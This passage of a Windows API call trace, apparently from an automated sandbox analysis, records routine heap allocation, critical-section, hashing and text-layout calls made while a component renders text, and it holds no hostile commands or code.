_Destination=0x6c5d76, _DestinationSize=0x1e8, _Source=0x197d88, _SourceSize=0x60 | out: _Destination=0x6c5d76) returned 0x0 [0161.502] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.502] IsWinEventHookInstalled (event=0x800e) returned 0 [0161.502] IsWinEventHookInstalled (event=0x8019) returned 1 [0161.502] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.502] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.504] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.504] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.504] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.504] memcpy_s (in: _Destination=0x6c5dd6, _DestinationSize=0x188, _Source=0x197a48, _SourceSize=0x2 | out: _Destination=0x6c5dd6) returned 0x0 [0161.504] IsWinEventHookInstalled (event=0x8019) returned 1 [0161.504] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.504] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.505] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.505] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.506] GetCurrentThreadId () returned 0xb48 [0161.506] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.506] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.506] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.506] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] IsCharSpaceW (wch=0x73) returned 0 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] IsCharSpaceW (wch=0x73) returned 0 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.507] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.507] GetCurrentThreadId () returned 0xb48 [0161.507] IUnknown:AddRef (This=0xd6c340) returned 0x0 [0161.507] IUnknown:Release (This=0xd6c340) returned 0x2 [0161.507] IUnknown:Release (This=0xd6c340) returned 0x2 [0161.507] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.508] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.508] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.508] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.508] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.508] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.508] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.509] memcpy_s (in: _Destination=0x6c5dfe, _DestinationSize=0x160, _Source=0x197d88, _SourceSize=0x2 | out: _Destination=0x6c5dfe) returned 0x0 [0161.509] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.510] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.510] IsWinEventHookInstalled (event=0x800e) returned 0 [0161.510] IsWinEventHookInstalled (event=0x8019) returned 1 [0161.511] GetCurrentThreadId () returned 0xb48 [0161.511] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.511] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.511] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.511] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.511] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.511] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.511] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.511] IsCharSpaceW (wch=0x74) returned 0 [0161.512] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.512] IsCharSpaceW (wch=0x74) returned 0 [0161.512] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.512] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.512] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.512] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.512] GetCurrentThreadId () returned 0xb48 [0161.512] IUnknown:AddRef (This=0xd1c880) returned 0x0 [0161.512] IUnknown:Release (This=0xd1c880) returned 0x2 [0161.512] IUnknown:Release (This=0xd1c880) returned 0x2 [0161.512] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.512] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.513] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.513] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.513] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.513] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.513] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.513] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.514] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.514] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.514] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.514] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.514] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.514] GetCurrentThreadId () returned 0xb48 [0161.514] IUnknown:AddRef (This=0xd6ab40) returned 0x0 [0161.514] IUnknown:Release (This=0xd6ab40) returned 0x4 [0161.514] IUnknown:Release (This=0xd6ab40) returned 0x3 [0161.515] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.515] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.515] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0161.515] GetFocus () returned 0x103e2 [0161.515] GetFocus () returned 0x103e2 [0161.515] GetFocus () returned 0x103e2 [0161.515] GetFocus () returned 0x103e2 [0161.515] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.515] LsSetDoc () returned 0x0 [0161.515] LsCreateLine () returned 0x0 [0161.516] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.516] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.516] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.516] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.516] LsGetRubyLsimethods () returned 0x0 [0161.516] LsGetTatenakayokoLsimethods () returned 0x0 [0161.516] LsGetHihLsimethods () returned 0x0 [0161.517] LsGetWarichuLsimethods () returned 0x0 [0161.517] LsGetReverseLsimethods () returned 0x0 [0161.517] LsCreateContext () returned 0x0 [0161.517] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x6d9f50 [0161.517] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d7f18 [0161.517] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6d0018 [0161.517] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d7f48 [0161.517] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x6bcb70 [0161.517] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9908 [0161.517] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d99f8 [0161.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2920 [0161.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db748 [0161.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d97f0 [0161.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9818 [0161.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9840 [0161.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d98b8 [0161.518] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x6dd2b8 [0161.518] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.518] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.518] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.518] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x6bce60 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x67c890 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdbc0 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x6da5c8 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6cb4a0 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x6ddfb8 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64ae30 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x6de238 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x6cdc08 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x6bc3d0 [0161.519] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x68d5a0 [0161.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x6de3d0 [0161.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b8c0 [0161.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x6de570 [0161.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x6bdcd8 [0161.520] LsSetModWidthPairs () returned 0x0 [0161.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x5f8320 [0161.520] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcb20 [0161.520] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.520] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.520] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.521] LsSetBreaking () returned 0x0 [0161.521] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x271) returned 0x6de708 [0161.521] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6d8fd0 [0161.521] LsSetDoc () returned 0x0 [0161.521] IOleInPlaceFrame:RemoveMenus (This=0xcfb520, hmenuShared=0x6da0fc) returned 0x0 [0161.521] IOleInPlaceFrame:RemoveMenus (This=0xcfb530, hmenuShared=0x6da0fc) returned 0x0 [0161.521] IOleInPlaceFrame:RemoveMenus (This=0xcfb540, hmenuShared=0x6da0fc) returned 0x0 [0161.521] IOleInPlaceFrame:RemoveMenus (This=0xcfb550, hmenuShared=0x6da0fc) returned 0x0 [0161.521] LsCreateLine () returned 0x0 [0161.521] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.521] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.521] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.522] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.522] LsQueryLineDup () returned 0x0 [0161.522] LsGetMinDurBreaks () returned 0x0 [0161.522] LsEnumLine () returned 0x0 [0161.522] LsDestroyLine () returned 0x0 [0161.522] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.522] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.522] LsSetDoc () returned 0x0 [0161.522] LsCreateLine () returned 0x0 [0161.523] LsQueryLineDup () returned 0x0 [0161.523] LsGetMinDurBreaks () returned 0x0 [0161.523] LsEnumLine () returned 0x0 [0161.523] LsDestroyLine () returned 0x0 [0161.523] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.523] LsSetDoc () returned 0x0 [0161.523] LsCreateLine () returned 0x0 [0161.524] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.524] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.524] LsGetRubyLsimethods () returned 0x0 [0161.524] LsGetTatenakayokoLsimethods () returned 0x0 [0161.524] LsGetHihLsimethods () returned 0x0 [0161.524] LsGetWarichuLsimethods () returned 0x0 [0161.524] LsGetReverseLsimethods () returned 0x0 [0161.524] LsCreateContext () returned 0x0 [0161.524] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x670) returned 0x9ef1628 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d82a8 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x6cb5b8 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d81e8 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2e4) returned 0x9ef1ca0 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9890 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9e80 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa0) returned 0x6d2a70 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x40) returned 0x6db628 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9d18 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ef8 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9cc8 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x20) returned 0x6d9ea8 [0161.526] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x400) returned 0x9ef1f90 [0161.527] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.527] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.527] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.527] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.527] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x128) returned 0x6de988 [0161.527] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x11c) returned 0x67aa80 [0161.527] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x9efab20 [0161.527] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x130) returned 0x6deab8 [0161.528] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x110) returned 0x9ef2398 [0161.528] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x278) returned 0x9ef24b0 [0161.547] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b990 [0161.547] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9ef2730 [0161.547] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x78) returned 0x6ce408 [0161.547] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xf0) returned 0x6cfbe0 [0161.547] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x4c) returned 0x68d3e8 [0161.547] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x194) returned 0x9ef28c8 [0161.548] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xc8) returned 0x64b0a0 [0161.548] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x190) returned 0x9ef2a68 [0161.548] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x108) returned 0x9ef9e00 [0161.548] LsSetModWidthPairs () returned 0x0 [0161.548] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x240) returned 0x5f7e90 [0161.548] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x18) returned 0x6dcae0 [0161.548] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.548] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.549] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.549] LsSetBreaking () returned 0x0 [0161.549] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x271) returned 0x9ef2c00 [0161.549] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xa) returned 0x6d8fe8 [0161.549] LsSetDoc () returned 0x0 [0161.549] IOleInPlaceFrame:RemoveMenus (This=0xcfb560, hmenuShared=0x9ef17d4) returned 0x0 [0161.549] IOleInPlaceFrame:RemoveMenus (This=0xcfb570, hmenuShared=0x9ef17d4) returned 0x0 [0161.549] IOleInPlaceFrame:RemoveMenus (This=0xcfb580, hmenuShared=0x9ef17d4) returned 0x0 [0161.549] IOleInPlaceFrame:RemoveMenus (This=0xcfb590, hmenuShared=0x9ef17d4) returned 0x0 [0161.549] LsCreateLine () returned 0x0 [0161.549] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.549] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.549] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.552] LsQueryLineDup () returned 0x0 [0161.552] LsGetMinDurBreaks () returned 0x0 [0161.553] LsEnumLine () returned 0x0 [0161.553] LsDestroyLine () returned 0x0 [0161.553] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.553] LsdnFinishRegular () returned 0x0 [0161.553] LsQueryLineDup () returned 0x0 [0161.553] IOleInPlaceFrame:SetMenu (This=0xd90440, hmenuShared=0x814c, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.553] LsGetMinDurBreaks () returned 0x0 [0161.553] LsdnQueryObjDimRange () returned 0x0 [0161.554] LsEnumLine () returned 0x0 [0161.554] LsQueryLineCpPpoint () returned 0x0 [0161.554] LsDestroyLine () returned 0x0 [0161.554] IOleInPlaceSite:CanInPlaceActivate (This=0xcfb520) returned 0x0 [0161.554] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.554] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.555] LsSetDoc () returned 0x0 [0161.555] LsCreateLine () returned 0x0 [0161.555] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.555] LsQueryLineDup () returned 0x0 [0161.555] LsGetMinDurBreaks () returned 0x0 [0161.555] LsEnumLine () returned 0x0 [0161.555] LsDestroyLine () returned 0x0 [0161.555] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.556] LsSetDoc () returned 0x0 [0161.556] LsCreateLine () returned 0x0 [0161.556] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.556] LsdnFinishRegular () returned 0x0 [0161.556] LsQueryLineDup () returned 0x0 [0161.556] IOleInPlaceFrame:SetMenu (This=0xd90460, hmenuShared=0x74cc, holemenu=0x0, hwndActiveObject=0x1) returned 0x0 [0161.556] LsGetMinDurBreaks () returned 0x0 [0161.556] LsdnQueryObjDimRange () returned 0x0 [0161.557] LsEnumLine () returned 0x0 [0161.557] LsQueryLineCpPpoint () returned 0x0 [0161.557] LsDestroyLine () returned 0x0 [0161.557] IOleInPlaceSite:CanInPlaceActivate (This=0xcfb560) returned 0x0 [0161.557] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.557] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9000 [0161.557] HashData (in: pbData=0x6d9000, cbData=0x1, pbHash=0x197010, cbHash=0x2 | out: pbHash=0x197010) returned 0x0 [0161.557] HashData (in: pbData=0x19700c, cbData=0x4, pbHash=0x197018, cbHash=0x2 | out: pbHash=0x197018) returned 0x0 [0161.557] HashData (in: pbData=0x6d9004, cbData=0xc, pbHash=0x197014, cbHash=0x2 | out: pbHash=0x197014) returned 0x0 [0161.557] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9000 | out: hHeap=0x5e0000) returned 1 [0161.557] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9168 [0161.557] HashData (in: pbData=0x6d9168, cbData=0x1, pbHash=0x197010, cbHash=0x2 | out: pbHash=0x197010) returned 0x0 [0161.557] HashData (in: pbData=0x19700c, cbData=0x4, pbHash=0x197018, cbHash=0x2 | out: pbHash=0x197018) returned 0x0 [0161.558] HashData (in: pbData=0x6d916c, cbData=0xc, pbHash=0x197014, cbHash=0x2 | out: pbHash=0x197014) returned 0x0 [0161.558] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9168 | out: hHeap=0x5e0000) returned 1 [0161.558] MulDiv (nNumber=100, nNumerator=37500, nDenominator=100) returned 37500 [0161.558] MulDiv (nNumber=100, nNumerator=0, nDenominator=37500) returned 0 [0161.558] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.558] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.558] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.558] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.558] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.558] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.559] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.559] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.559] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.559] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.559] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d91f8 [0161.559] HashData (in: pbData=0x6d91f8, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.559] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.559] HashData (in: pbData=0x6d91fc, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.559] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d91f8 | out: hHeap=0x5e0000) returned 1 [0161.559] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9168 [0161.559] HashData (in: pbData=0x6d9168, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.560] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.560] HashData (in: pbData=0x6d916c, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.560] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9168 | out: hHeap=0x5e0000) returned 1 [0161.560] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.560] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.560] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.560] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.560] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.560] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9000 [0161.560] HashData (in: pbData=0x6d9000, cbData=0x1, pbHash=0x196818, cbHash=0x2 | out: pbHash=0x196818) returned 0x0 [0161.560] HashData (in: pbData=0x196814, cbData=0x4, pbHash=0x196820, cbHash=0x2 | out: pbHash=0x196820) returned 0x0 [0161.560] HashData (in: pbData=0x6d9004, cbData=0xc, pbHash=0x19681c, cbHash=0x2 | out: pbHash=0x19681c) returned 0x0 [0161.561] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9000 | out: hHeap=0x5e0000) returned 1 [0161.561] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.561] LsSetDoc () returned 0x0 [0161.561] LsCreateLine () returned 0x0 [0161.561] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0161.561] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.561] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x1957a8, cbHash=0x2 | out: pbHash=0x1957a8) returned 0x0 [0161.561] HashData (in: pbData=0x1957a4, cbData=0x4, pbHash=0x1957b0, cbHash=0x2 | out: pbHash=0x1957b0) returned 0x0 [0161.561] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x1957ac, cbHash=0x2 | out: pbHash=0x1957ac) returned 0x0 [0161.561] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 | out: hHeap=0x5e0000) returned 1 [0161.561] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x6d9138 [0161.562] HashData (in: pbData=0x6d9138, cbData=0x1, pbHash=0x1957a8, cbHash=0x2 | out: pbHash=0x1957a8) returned 0x0 [0161.562] HashData (in: pbData=0x1957a4, cbData=0x4, pbHash=0x1957b0, cbHash=0x2 | out: pbHash=0x1957b0) returned 0x0 [0161.562] HashData (in: pbData=0x6d913c, cbData=0xc, pbHash=0x1957ac, cbHash=0x2 | out: pbHash=0x1957ac) returned 0x0 [0161.562] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d9138 